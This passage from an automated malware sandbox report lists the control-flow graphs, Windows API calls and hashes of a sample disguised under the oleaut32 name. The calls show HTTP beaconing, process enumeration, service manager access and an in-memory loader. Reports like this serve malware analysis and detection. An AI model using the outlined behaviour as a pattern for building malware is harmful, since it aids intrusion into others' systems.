                                    • GetNativeSystemInfo.KERNELBASE(33A6B453,33A6B453), ref: 005E53C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoNativeSystem
                                    • String ID: 5sF$5sF
                                    • API String ID: 1721193555-3318035110
                                    • Opcode ID: 417d19fda59c48bcc7b6a5d1acb4ba159ff73dfc2992e4623442c4af3d68b8c4
                                    • Instruction ID: b5903ec9d657fccbb27b1c2aa956993c950cca51fc82502e21e56882793548b5
                                    • Opcode Fuzzy Hash: 417d19fda59c48bcc7b6a5d1acb4ba159ff73dfc2992e4623442c4af3d68b8c4
                                    • Instruction Fuzzy Hash: 70212535A006D087CB2C8A2A89852BE7E90BBC838CF580D6AF6C6DF250F674CD445393
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Pra$l
                                    • API String ID: 0-3288218883
                                    • Opcode ID: 87b7e389a79e8c62927cbfeda5b6a30871acc089a44db05403fb20376ab61339
                                    • Instruction ID: 422630ee194f53e7c9760621ea6033739d431f1e03f923123afd9cc93af582f0
                                    • Opcode Fuzzy Hash: 87b7e389a79e8c62927cbfeda5b6a30871acc089a44db05403fb20376ab61339
                                    • Instruction Fuzzy Hash: E9911672A043828BDB1CDF66C888B6ABBE5BBC8710F04496DE9C59F358D630DD05CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 107 5e2b60-5e2b94 108 5e2b98-5e2b9c 107->108 109 5e2ba0-5e2ba6 108->109 110 5e2bac 109->110 111 5e2d4d-5e2d53 109->111 112 5e2cf7-5e2cf9 110->112 113 5e2bb2-5e2bb8 110->113 114 5e2d59 111->114 115 5e2e94-5e2e9a 111->115 120 5e2cfb-5e2d01 112->120 121 5e2d03-5e2d05 112->121 116 5e2bbe 113->116 117 5e2c66-5e2c6c 113->117 118 5e2d5f-5e2d65 114->118 119 5e2de9-5e2df0 114->119 122 5e2e9c-5e2ea2 115->122 123 5e2ed5-5e2ed7 115->123 124 5e2f94-5e2f9b 116->124 125 5e2bc4-5e2bca 116->125 133 5e2c6e-5e2c74 117->133 134 5e2cd0-5e2ce9 call 5e2900 117->134 126 5e2ddf-5e2de4 118->126 127 5e2d67-5e2d6d 118->127 128 5e2e0d-5e2e35 InternetOpenW 119->128 129 5e2df2-5e2e08 call 5e3e40 call 5e3da0 119->129 132 5e2d07-5e2d0e 120->132 121->132 135 5e2ea4-5e2eab 122->135 136 5e2e83-5e2e89 122->136 130 5e2eeb 123->130 131 5e2ed9-5e2ee9 call 5e3480 123->131 140 5e2f9d-5e2fb3 call 5e3e40 call 5e3da0 124->140 141 5e2fb8 124->141 138 5e2bcc-5e2bd2 125->138 139 5e2c06-5e2c15 125->139 126->109 127->136 149 5e2d73-5e2d89 call 5e41c0 127->149 147 5e2e37-5e2e4d call 5e3e40 call 5e3da0 128->147 148 5e2e52-5e2e5d 128->148 129->128 146 5e2eef-5e2ef6 130->146 131->146 144 5e2d2b-5e2d48 HttpSendRequestW 132->144 145 5e2d10-5e2d26 call 5e3e40 call 5e3da0 132->145 133->136 150 5e2c7a-5e2c81 133->150 171 5e2ced-5e2cf2 134->171 153 5e2ead-5e2ec3 call 5e3e40 call 5e3da0 135->153 154 5e2ec8-5e2ed0 InternetCloseHandle 135->154 151 5e2fbe-5e2fc9 136->151 152 5e2e8f 136->152 138->136 157 5e2bd8-5e2bdf 138->157 165 5e2c17-5e2c2d call 5e3e40 call 5e3da0 139->165 166 5e2c32-5e2c48 139->166 140->141 141->151 144->108 145->144 162 5e2ef8-5e2f0e call 5e3e40 call 5e3da0 146->162 163 5e2f13-5e2f31 146->163 147->148 192 5e2e5f-5e2e75 call 5e3e40 call 5e3da0 148->192 193 5e2e7a-5e2e80 148->193 195 5e2d8b-5e2d92 149->195 196 5e2dd5-5e2dda 149->196 168 5e2c9e-5e2ccb InternetConnectW 150->168 169 5e2c83-5e2c99 call 5e3e40 call 5e3da0 150->169 152->108 153->154 154->109 172 5e2bfc-5e2c04 157->172 173 5e2be1-5e2bf7 call 5e3e40 call 5e3da0 157->173 162->163 206 5e2f4e-5e2f59 163->206 207 5e2f33-5e2f49 call 5e3e40 call 5e3da0 163->207 165->166 166->171 209 5e2c4e-5e2c56 166->209 168->109 169->168 171->109 172->109 173->172 192->193 193->136 210 5e2daf-5e2dbb ObtainUserAgentString 195->210 211 5e2d94-5e2daa call 5e3e40 call 5e3da0 195->211 196->109 233 5e2f5b-5e2f71 call 5e3e40 call 5e3da0 206->233 234 5e2f76-5e2f8f 206->234 207->206 209->171 218 5e2c5c-5e2c61 209->218 220 5e2dce-5e2dd0 call 5e4120 210->220 221 5e2dbd-5e2dca call 5e5620 210->221 211->210 218->109 220->196 221->220 233->234 234->109
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E2CB4
                                    • HttpSendRequestW.WININET(00000000,?,000000FF,00000000,00000000), ref: 005E2D34
                                    • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 005E2DB7
                                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E2E19
                                    • InternetCloseHandle.WININET(?), ref: 005E2EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                    • String ID: W6o$'aR$0B:o
                                    • API String ID: 1741791824-529227690
                                    • Opcode ID: 5eaf8a6d52cd96a1c927b009d01b979c630ee5c28e1ad210adaa0a17b918a69f
                                    • Instruction ID: 80b05ce33d074cb87c3619b905e00a98dde6b36db86da2487b614a4c90e663a9
                                    • Opcode Fuzzy Hash: 5eaf8a6d52cd96a1c927b009d01b979c630ee5c28e1ad210adaa0a17b918a69f
                                    • Instruction Fuzzy Hash: B6B1E271A043814BDB2CAF668D8973A7AEEBBD8740F500869F9D5DF394EA70CD009791

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 474 5e9860-5e9876 475 5e9880-5e9885 474->475 476 5e99be-5e99c3 475->476 477 5e988b 475->477 478 5e99c9-5e99ce 476->478 479 5e9a54-5e9a5b 476->479 480 5e99b4-5e99b9 477->480 481 5e9891-5e9896 477->481 482 5e9a3c-5e9a41 478->482 483 5e99d0-5e99d7 478->483 486 5e9a5d-5e9a73 call 5e3e40 call 5e3da0 479->486 487 5e9a78 479->487 480->475 484 5e989c-5e98a1 481->484 485 5e995a-5e9970 481->485 482->475 490 5e9a47-5e9a51 482->490 488 5e99d9-5e99ef call 5e3e40 call 5e3da0 483->488 489 5e99f4-5e9a09 483->489 491 5e98a3-5e98a8 484->491 492 5e9920-5e9927 call 5e9a90 484->492 493 5e998d-5e999e 485->493 494 5e9972-5e9988 call 5e3e40 call 5e3da0 485->494 486->487 501 5e9a7b-5e9a85 487->501 488->489 514 5e9a0b-5e9a21 call 5e3e40 call 5e3da0 489->514 515 5e9a26-5e9a37 489->515 491->482 497 5e98ae-5e98b5 491->497 516 5e98e8-5e98ef 492->516 517 5e9929-5e9930 492->517 493->501 519 5e99a4-5e99af 493->519 494->493 503 5e98b7-5e98cd call 5e3e40 call 5e3da0 497->503 504 5e98d2-5e98df FindFirstChangeNotificationW call 5e9a90 497->504 503->504 520 5e98e4-5e98e6 504->520 514->515 515->475 521 5e990c-5e991b 516->521 522 5e98f1-5e9907 call 5e3e40 call 5e3da0 516->522 527 5e994d 517->527 528 5e9932-5e9948 call 5e3e40 call 5e3da0 517->528 519->475 520->516 529 5e9950-5e9955 520->529 521->475 522->521 527->529 528->527 529->475
                                    APIs
                                    • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 005E98DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeFindFirstNotification
                                    • String ID: Ma:$Ma:$`2a
                                    • API String ID: 1065410024-1733098092
                                    • Opcode ID: 6d63c3eb9e31d12657517ea9612356a48a8611087c39d25031d6328592e35320
                                    • Instruction ID: e589942e9f720df8ee3d5b998c958b960c6b4a6a7a119796b508780c9a18f693
                                    • Opcode Fuzzy Hash: 6d63c3eb9e31d12657517ea9612356a48a8611087c39d25031d6328592e35320
                                    • Instruction Fuzzy Hash: 4341C470B142C18BCB6CEF7A9D8967A3AA5BBD4740F04486EF5C5CB390EA34CD049792

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 545 5e4b90-5e4ba6 546 5e4bb0-5e4bb5 545->546 547 5e4bbb 546->547 548 5e4c75-5e4c7a 546->548 549 5e4c2e-5e4c3d 547->549 550 5e4bbd-5e4bc2 547->550 551 5e4cbe-5e4cc3 548->551 552 5e4c7c-5e4c81 548->552 553 5e4c3f-5e4c55 call 5e3e40 call 5e3da0 549->553 554 5e4c5a-5e4c70 Process32FirstW 549->554 555 5e4cc8-5e4ccf 550->555 556 5e4bc8-5e4bcd 550->556 551->546 557 5e4ca9-5e4cae 552->557 558 5e4c83-5e4c8a 552->558 553->554 554->546 561 5e4cec-5e4ced FindCloseChangeNotification 555->561 562 5e4cd1-5e4ce7 call 5e3e40 call 5e3da0 555->562 563 5e4bcf-5e4bd4 556->563 564 5e4c16-5e4c2c 556->564 557->546 559 5e4cb4-5e4cbd 557->559 558->554 565 5e4c8c-5e4ca7 call 5e3e40 call 5e3da0 558->565 569 5e4cef-5e4cf8 561->569 562->561 563->557 568 5e4bda-5e4be1 563->568 564->546 565->554 574 5e4bfe-5e4c09 CreateToolhelp32Snapshot 568->574 575 5e4be3-5e4bf9 call 5e3e40 call 5e3da0 568->575 574->569 581 5e4c0f-5e4c14 574->581 575->574 581->546
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 005E4C02
                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 005E4C60
                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?), ref: 005E4CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
                                    • String ID: @UJ)
                                    • API String ID: 692674288-2550355097
                                    • Opcode ID: ace568a5e853c9dcd4cede16183016f307061581db4dde36405e41e165706bc7
                                    • Instruction ID: a5838ec5c0823d521c0618b9da69841e8f676232c3256a55acac5a0340a31bb0
                                    • Opcode Fuzzy Hash: ace568a5e853c9dcd4cede16183016f307061581db4dde36405e41e165706bc7
                                    • Instruction Fuzzy Hash: 0C312D71B102C1479B2C9A779C9E63E2AD9B7D4300B244817F4D9DB390EA3CCD499B91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 587 5e9530-5e9548 588 5e9550-5e9555 587->588 589 5e955b 588->589 590 5e96f4-5e96f9 588->590 593 5e967d-5e9684 589->593 594 5e9561-5e9566 589->594 591 5e96ff 590->591 592 5e97c7-5e97cc 590->592 597 5e9773-5e977a 591->597 598 5e9701-5e9706 591->598 601 5e97d2-5e97f7 592->601 602 5e9580-5e9585 592->602 595 5e9686-5e969c call 5e3e40 call 5e3da0 593->595 596 5e96a1-5e96ac 593->596 599 5e956c 594->599 600 5e9614-5e9619 594->600 595->596 628 5e96ae-5e96c4 call 5e3e40 call 5e3da0 596->628 629 5e96c9-5e96da 596->629 604 5e977c-5e9792 call 5e3e40 call 5e3da0 597->604 605 5e9797-5e97a6 OpenSCManagerW 597->605 606 5e9708-5e970d 598->606 607 5e9722-5e9729 598->607 608 5e956e-5e9573 599->608 609 5e95e3-5e95ea 599->609 600->602 611 5e961f-5e9678 600->611 601->588 602->588 610 5e9587-5e9593 602->610 604->605 622 5e97bd-5e97c2 605->622 623 5e97a8-5e97b8 605->623 606->602 614 5e9713-5e971d call 5e7950 606->614 620 5e972b-5e9741 call 5e3e40 call 5e3da0 607->620 621 5e9746-5e976e call 5e3c80 607->621 618 5e9594-5e959c 608->618 619 5e9575-5e957a 608->619 615 5e95ec-5e9602 call 5e3e40 call 5e3da0 609->615 616 5e9607-5e960f 609->616 611->588 614->588 615->616 616->588 632 5e959e-5e95b6 call 5e3e40 call 5e3da0 618->632 633 5e95bc-5e95d0 618->633 619->602 630 5e97fc-5e9803 619->630 620->621 621->588 622->588 623->588 628->629 654 5e9848-5e9854 629->654 655 5e96e0-5e96ef 629->655 643 5e9805-5e981b call 5e3e40 call 5e3da0 630->643 644 5e9820-5e982b 630->644 632->633 651 5e95d4-5e95de 633->651 643->644 658 5e982f-5e9845 call 5e3000 644->658 651->588 655->588 658->654
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 005E97A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID: p^v$y7@+
                                    • API String ID: 1889721586-460274923
                                    • Opcode ID: 1e3defe9f8e2722f0ac4c59366e262e61cb783adc4ba0d6899cf0707935a9568
                                    • Instruction ID: 1c730bd6ebae7f2740fa3158bbd4a267412c5ed00aa428b8659a1e498f60931f
                                    • Opcode Fuzzy Hash: 1e3defe9f8e2722f0ac4c59366e262e61cb783adc4ba0d6899cf0707935a9568
                                    • Instruction Fuzzy Hash: 9A7182707143828BD71C9F2A998977A7AA5BBD4B40F50082EF1C9DF251EA30DD09D7A2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 669 5e6d70-5e6d77 670 5e6d80-5e6d85 669->670 671 5e6d8b 670->671 672 5e6e14-5e6e19 670->672 673 5e6d8d-5e6d92 671->673 674 5e6dfb-5e6e0f call 5e6cd0 671->674 675 5e6eee-5e6ef3 672->675 676 5e6e1f 672->676 677 5e6dde-5e6de3 673->677 678 5e6d94 673->678 674->670 680 5e6da8-5e6dad 675->680 681 5e6ef9-5e6f0a call 5e6cd0 675->681 682 5e6e56-5e6e69 call 5e3480 676->682 683 5e6e21-5e6e26 676->683 677->680 692 5e6de5-5e6df9 call 5e6cd0 677->692 684 5e6dc8-5e6ddc call 5e6cd0 678->684 685 5e6d96-5e6d9b 678->685 680->670 687 5e6daf-5e6db1 680->687 681->670 706 5e6e6b-5e6e81 call 5e3e40 call 5e3da0 682->706 707 5e6e86-5e6e99 LoadLibraryW 682->707 689 5e6e3d-5e6e51 call 5e6cd0 683->689 690 5e6e28-5e6e2d 683->690 684->670 693 5e6d9d-5e6da2 685->693 694 5e6db2-5e6dc6 call 5e6cd0 685->694 689->670 690->680 696 5e6e33-5e6e38 690->696 692->670 693->680 702 5e6f0f-5e6f1a 693->702 694->670 696->670 706->707 709 5e6e9b-5e6eb1 call 5e3e40 call 5e3da0 707->709 710 5e6eb6-5e6ec1 707->710 709->710 719 5e6ede-5e6ee9 710->719 720 5e6ec3-5e6ed9 call 5e3e40 call 5e3da0 710->720 719->670 720->719
                                    APIs
                                      • Part of subcall function 005E6CD0: LoadLibraryW.KERNELBASE(00000000,?,33A6B453,005E6F05,?,33A6B453,005E68AC), ref: 005E6D00
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,005E68AC), ref: 005E6E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ;g+$;g+
                                    • API String ID: 1029625771-3974242271
                                    • Opcode ID: 03cafb9de938bfbdc0de1e6ded0fa9f3eb61351498719bb823be7b20e4fe58d3
                                    • Instruction ID: ad2aa84bec72b764bd530fb9c591cdcf1821c433e8d20890dfc38c050bb6e0b8
                                    • Opcode Fuzzy Hash: 03cafb9de938bfbdc0de1e6ded0fa9f3eb61351498719bb823be7b20e4fe58d3
                                    • Instruction Fuzzy Hash: 7631A3557041D587CA2CAA3F4E9D63F2DA6BBF43C0BA44876E5C9CF380D924CC4157A2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 727 5e9bf0-5e9bfc 728 5e9c00-5e9c05 727->728 729 5e9cde-5e9ce5 728->729 730 5e9c0b-5e9c10 728->730 731 5e9ce7-5e9cfd call 5e3e40 call 5e3da0 729->731 732 5e9d02-5e9d19 CreateThread 729->732 733 5e9c9e-5e9ca5 730->733 734 5e9c16-5e9c1b 730->734 731->732 735 5e9d1c-5e9d24 732->735 736 5e9ca7-5e9cbd call 5e3e40 call 5e3da0 733->736 737 5e9cc2-5e9cd9 733->737 739 5e9c1d-5e9c24 734->739 740 5e9c8a-5e9c8f 734->740 736->737 737->728 744 5e9c26-5e9c3c call 5e3e40 call 5e3da0 739->744 745 5e9c41-5e9c4c 739->745 740->728 741 5e9c95-5e9c9d 740->741 744->745 756 5e9c4e-5e9c64 call 5e3e40 call 5e3da0 745->756 757 5e9c69-5e9c7a 745->757 756->757 757->735 763 5e9c80-5e9c85 757->763 763->728
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,005E9860,00000000,00000000,00000000,33A6B453,005E6695), ref: 005E9D11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID: `2a$p^v
                                    • API String ID: 2422867632-822847788
                                    • Opcode ID: 09bc63739c86d49e1cc9814245655d8049161b7b3ee92c355cd8054f4b7ca471
                                    • Instruction ID: f008d596a682bf45087da45cb76817aef5b91812166590c4ac0ba9840894063b
                                    • Opcode Fuzzy Hash: 09bc63739c86d49e1cc9814245655d8049161b7b3ee92c355cd8054f4b7ca471
                                    • Instruction Fuzzy Hash: 922171B07403C15BDB6CAB365D5AB2A2BD67BA4B40F24442AF5C9CF2D0DA309D049755

                                    Control-flow Graph

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 005E5B9B
                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 005E5C0A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateFree
                                    • String ID: p^v
                                    • API String ID: 2488874121-2513449335
                                    • Opcode ID: 7879bd0964eb21e5a67e2a8f8aec5f4ec9ac6f69f4043ce718f1722d51287bb4
                                    • Instruction ID: c7c90da41777ef47d3dfa6626c255186de40bce94e2900226ad4c2c4f3cbdf45
                                    • Opcode Fuzzy Hash: 7879bd0964eb21e5a67e2a8f8aec5f4ec9ac6f69f4043ce718f1722d51287bb4
                                    • Instruction Fuzzy Hash: 87110670B007C10BDB1CAB7A5D89A2F2AEABBD8640B144479F088CF350FA24CC065790

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 827 4f002d-4f009e call 4f0456 * 6 840 4f00a7-4f00b0 827->840 841 4f00a0-4f00a2 827->841 840->841 843 4f00b2-4f00b6 840->843 842 4f044e-4f0455 841->842 843->841 844 4f00b8-4f00c2 843->844 845 4f00e4-4f0105 GetNativeSystemInfo 844->845 846 4f00c4-4f00c7 844->846 845->841 848 4f0107-4f012d VirtualAlloc 845->848 847 4f00c9-4f00cf 846->847 849 4f00d6 847->849 850 4f00d1-4f00d4 847->850 851 4f012f-4f0133 848->851 852 4f0162-4f016c 848->852 855 4f00d9-4f00e2 849->855 850->855 856 4f0135-4f0138 851->856 853 4f016e-4f0173 852->853 854 4f01a4-4f01b5 852->854 857 4f0177-4f018a 853->857 858 4f01b7-4f01d1 854->858 859 4f0234-4f0240 854->859 855->845 855->847 860 4f013a-4f0142 856->860 861 4f0153-4f0155 856->861 862 4f018c-4f0193 857->862 863 4f0199-4f019e 857->863 880 4f01d3 858->880 881 4f0222-4f022e 858->881 864 4f0246-4f025d 859->864 865 4f02f0-4f02fa 859->865 860->861 866 4f0144-4f0147 860->866 867 4f0157-4f015c 861->867 862->862 869 4f0195 862->869 863->857 872 4f01a0 863->872 864->865 873 4f0263-4f0273 864->873 870 4f03b2-4f03c7 call 20d27b0 865->870 871 4f0300-4f0307 865->871 875 4f014e-4f0151 866->875 876 4f0149-4f014c 866->876 867->856 868 4f015e 867->868 868->852 869->863 895 4f03c9-4f03ce 870->895 877 4f0309-4f0312 871->877 872->854 878 4f02d5-4f02e6 873->878 879 4f0275-4f0279 873->879 875->867 876->861 876->875 884 4f0318-4f0333 877->884 885 4f03a7-4f03ac 877->885 878->873 882 4f02ec 878->882 886 4f027a-4f0289 879->886 887 4f01d7-4f01db 880->887 881->858 883 4f0230 881->883 882->865 883->859 889 4f034d-4f034f 884->889 890 4f0335-4f0337 884->890 885->870 885->877 891 4f028b-4f028f 886->891 892 4f0291-4f029a 886->892 893 4f01dd 887->893 894 4f01fb-4f0204 887->894 900 4f0368-4f036a 889->900 901 4f0351-4f0353 889->901 896 4f0339-4f033e 890->896 897 4f0340-4f0343 890->897 891->892 898 4f029c-4f02a1 891->898 899 4f02c3-4f02c7 892->899 893->894 902 4f01df-4f01f9 893->902 903 4f0207-4f021c 894->903 904 4f044c 895->904 905 4f03d0-4f03d4 895->905 909 4f0345-4f034b 896->909 897->909 910 4f02b4-4f02b7 898->910 911 4f02a3-4f02b2 898->911 899->886 906 4f02c9-4f02d1 899->906 907 4f036c 900->907 908 4f0371-4f0376 900->908 912 4f0359-4f035b 901->912 913 4f0355-4f0357 901->913 902->903 903->887 918 4f021e 903->918 904->842 905->904 917 4f03d6-4f03e0 905->917 906->878 915 4f036e-4f036f 907->915 919 4f0379-4f0380 908->919 909->919 910->899 914 4f02b9-4f02bf 910->914 911->899 912->900 916 4f035d-4f035f 912->916 913->915 914->899 915->919 916->919 920 4f0361-4f0366 916->920 917->904 921 4f03e2-4f03e6 917->921 918->881 922 4f0388-4f039d VirtualProtect 919->922 923 4f0382 919->923 920->919 921->904 924 4f03e8-4f03f9 921->924 922->841 925 4f03a3 922->925 923->922 924->904 926 4f03fb-4f0400 924->926 925->885 927 4f0402-4f040f 926->927 927->927 928 4f0411-4f0415 927->928 929 4f042d-4f0433 928->929 930 4f0417-4f0429 928->930 929->904 932 4f0435-4f044b 929->932 930->926 931 4f042b 930->931 931->904 932->904
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,004F0005), ref: 004F00E9
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,004F0005), ref: 004F0111
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4f0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 2032221330-0
                                    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction ID: f8823f645b79a1bde220dcd0d2c7b56732e52b17d2554e0e7bdf045428ff90c3
                                    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction Fuzzy Hash: 19D19F7160430A8FD724CF59C98477AB3E0BFD4318F18452EEA958B342E778E845CB99

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 935 5e9a90-5e9a9e 936 5e9aa0-5e9aa5 935->936 937 5e9aab 936->937 938 5e9b88-5e9b8d 936->938 939 5e9b49-5e9b50 937->939 940 5e9ab1-5e9ab6 937->940 941 5e9ac3-5e9ac8 938->941 942 5e9b93-5e9b98 938->942 945 5e9b6d-5e9b83 939->945 946 5e9b52-5e9b68 call 5e3e40 call 5e3da0 939->946 943 5e9ab8-5e9abd 940->943 944 5e9ad6-5e9ae6 940->944 941->936 947 5e9aca-5e9ad5 941->947 942->936 943->941 948 5e9b9d-5e9ba4 943->948 950 5e9ae8-5e9b00 call 5e3e40 call 5e3da0 944->950 951 5e9b06-5e9b0e 944->951 945->936 946->945 957 5e9ba6-5e9bbc call 5e3e40 call 5e3da0 948->957 958 5e9bc1-5e9be5 lstrcmpiW 948->958 950->951 955 5e9b2e-5e9b44 GetCurrentProcess QueryFullProcessImageNameW 951->955 956 5e9b10-5e9b28 call 5e3e40 call 5e3da0 951->956 955->936 956->955 957->958
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 005E9B3A
                                    • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 005E9B3D
                                    • lstrcmpiW.KERNELBASE(?,?,0DFA437B,?), ref: 005E9BCE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                    • String ID:
                                    • API String ID: 3605714105-0
                                    • Opcode ID: 200184b14c00e718afbbe79480c7c0d74b9f950c6d0f3658a704f9cb83be2d58
                                    • Instruction ID: ac69e52efe17048eb2cc01850e13f42a1e4e9ca6bab31987da9691f93b069cf4
                                    • Opcode Fuzzy Hash: 200184b14c00e718afbbe79480c7c0d74b9f950c6d0f3658a704f9cb83be2d58
                                    • Instruction Fuzzy Hash: F6313871B142C44BDB2C9B6AAC89A7A3BE9BBD8750F44042AF4C2CB340D974CD058BA1
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00410274
